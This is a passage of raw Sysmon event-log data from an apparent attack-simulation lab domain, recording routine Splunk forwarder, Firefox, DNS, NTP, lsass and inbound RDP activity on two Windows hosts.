Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D25712B0131E808E6D7AC6F1E494A48A,SHA256=120C568685A18DB7FB05ABE369308704C34121687701E337F3B9558DB55AB8B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.669{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-63651-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001047944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:01.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB16A69B40F919FF5C68DD39C9BD1D5,SHA256=318300E65E70E0E13ED81739DCA00F45083ECBB66EE95D38498E4EA6B79B0DE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:01.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7A4239E6E2CC406620636EC56D8C7A6,SHA256=0881FFEF69009F8573761324355CD8267F3F7B24AE51ED5F2ED0228CA9A06504,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001047943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:50:01.248{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f2-0x84c67cb0) 354300x8000000000000000807134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:59.357{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57234-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:02.734{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C3B8A4451773C28B09691A100BC1486,SHA256=688D320FD7DDC0F9D2D2332AB808886018FD41892272ED9B767D35651599DE15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:02.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB75CDC48DA08EE6E3337F84DC446299,SHA256=A37ED46CE28F0E56C9C55FA6CECBE52D33F4E046386B610B51682161DF9B4005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:02.266{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:02.218{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001047948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:02.218{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001047947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:50:02.218{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1213.86000569C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001047946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:50:02.218{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1213.86000569C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001047945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.647{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50994-false10.0.1.12-8000- 23542300x80000000000000001047964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.750{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F58C2032CFF5B1640A4077F6D33B18F,SHA256=AC095F101BB017EFB9F7A23321AB898F4DBDCBC6830A9028F641B21031EFD0AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:03.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EF904BA1FC444CFA3B1C582000B02B5,SHA256=7D4EC1F71C7FA0A2A9E98565FBCDB16351ADC483746E4F4E35259D00EF1DA3CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CF029EB0D382EA443BFFA0F91B4BB548,SHA256=E694FC40111DB195960A51C4DD790802FA0349F04E7D4B45D2D2BFA5B7FB08F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BCF44BE4CDEC30E382B0E19CFF49DD01,SHA256=7278747F83D5DCB0BB016ECFFD19C845AA00FCD81CCBD9F9D6FCCA0EDFCF1559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=836988B77F4245D4B293A01DAEEDE930,SHA256=6411BD8BFBF940ED08419C62A0B3BF7411B89ACA405D230B38AA7E98C8580956,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D87D2CA6DC738B74A5EC64779DA92028,SHA256=5FD42DB378C1A93EE9EA0DBFAD5BE46D773350C80EC6FC9337F469DD54B037E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7C471D6EB21BA36FD1BAC52EDF9196A8,SHA256=24F8178ADD0005F0A98C1E3849D788FC94C8C393BFA11AF3633CA93406F52ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=00D619B0C47D6325B58694F40BDD9C70,SHA256=B7891708401962F8E66B5B810AED1DD70AB81FA6724A0485621CC18D7BE736FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=69D136AE18059456D7098D0EA3E4C183,SHA256=99DB653A3D376292122B1E3F784A3A710FB725F19828CBC790003B70536826B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BC186EB0DDC9742DF25A70168095FA2D,SHA256=C7B4CA534133B3279E6522DE6CDD135E922FA9E9BC68AD0E0777CA6ED04F3B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=948669950AA0639BA16CED89FA1B6B95,SHA256=F977063EECB3E891A24AA697ADD82205E287030533D849880AB061ADE5337019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=70E33C90C2D081F5FB90D1DED3FF0D5F,SHA256=DC5F3191284F9983E9AECB37B99756AE439F2889D3428B22DD90F5F4AE341B58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F859949E100585A6AD76A00602767B85,SHA256=A8185FA31199A4DC22E795A3CFC652BA633BDA6591978A74A85D7F09BDE8F596,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.780{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-890.attackrange.local123ntpfalse169.254.169.123-123ntp 23542300x80000000000000001047967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:04.781{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAFE68457124CD4900FD9E4DDA484FFE,SHA256=5D14EB3AA6E7E4AAA88A21A49ED5D3BD2D2DFC8CC4E6C9AA9DD0B301234E24E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:03.510{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57235-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000807141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:03.247{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-25325-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:04.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF6A41A543839494246A28B65C9C3813,SHA256=C5BDBA0769A8310A27E2C18B5EBF3850CBFC401169CCA8A35E376C7136DA427F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:04.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=227B677EA547B73F55CC09286F12329C,SHA256=475B57A627440797C48F0580DA53B542A066934E3B14515039374F0167B7733C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:04.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01D01FC0A5FF535792746897E525AFCD,SHA256=67E9AB706D58B0E6552C320F20F00E41AB899F002E9061196242460AB26DA0D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:04.218{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=FDDA9697335DAA8510A1DD6EFF615B73,SHA256=5CC54205F6C9B9D1545ADD7D1423516F9EB31E241293FEC24BFC82E3D9FF5F4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:55.997{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local60931- 23542300x80000000000000001047969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:05.799{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D73F715E3FC3CA9616B1500FEAC208A,SHA256=B0B2414DEDA3D7B5E400AD5EC5BFE1E32A1784D9A8B1A1B4A9526B0207A318A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:05.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3517221302AE5F4308927D23BD0F05C1,SHA256=AB5BBB56DA4D10C1825D1FB514995CF064FABE61EF2D028C172F26E64C727E95,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:56.907{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57235-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001047970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:06.817{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1187C10BE33016A9F89BD77EC9C4E0E9,SHA256=EFD9695BD315F7B8CB796D3097D594999EE37F76B9C4BA6B7A91AB0C8A2F3D9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:06.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B69DCB104D00E494E26E41848CA7294F,SHA256=58D0575B8BFCADC1A445786222978592CF553D0F17966951BE88DABF0B73BD47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:07.818{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4641F5A4E859D20ED45ED9BC240A5E6,SHA256=AE071D04D67BCC041EDFFEDF788465B86DF149228F458A814BA52FF8675CABAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:07.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EA7A72D23883D995585D188B78F1C49,SHA256=BC5BA9FF8F19266FCE2AD1F0075BA2FC0A74E8CD460D0FB1137F257B2F81E9F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:58.747{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50995-false10.0.1.12-8000- 354300x8000000000000000807145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:05.357{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57236-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:08.833{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B2438FA0AB9460151DDB091CEEF4B0C,SHA256=2A36E10EF8836252BF8C990A3391292FB91486AE4D1B8CC6D91D2E91B1DAD715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:08.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED15D4BD246B266334ADE8E1DC79CA7D,SHA256=30722581349AEC36EC44C07BB4BFBB3414E8CD0FD767771308688FFE97424B9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:59.728{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61036- 23542300x80000000000000001047975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:09.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB89C39A0A073C3AA68FF6B9B4608CCB,SHA256=1DA8732E5D3773BBE6F03FAA86F8919AC9584E8B843C0A1EA3A15C3489566A18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:09.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=751EC5D12AC00B21577115AF62F13115,SHA256=60E09EFA41E256C3CF96828C5233AAC929EC6C6A41D8C06D99D68458D0B18933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:10.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=870AD9F5750208247BBD90DD94CC7E45,SHA256=772AB45755ABE9F6DF0C9B1C4F8A682A34C5FE4F7DEB7C6CD97B50F6D6CEB8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:10.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DB8D08D59D3E4D2F4F8D0C4761D46DC,SHA256=B15784723A78C4A33CDD714AAE5B98F055285E0C6570C07DA57357C1BD465D41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:11.896{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EFED3CAD70B377B02FD020A1C6BBB52,SHA256=A5660F892B216609713386598974EE4D202B96340FFB43805F41E127ADDD6299,IMPHASH=00000000000000000000000000000000falsetrue 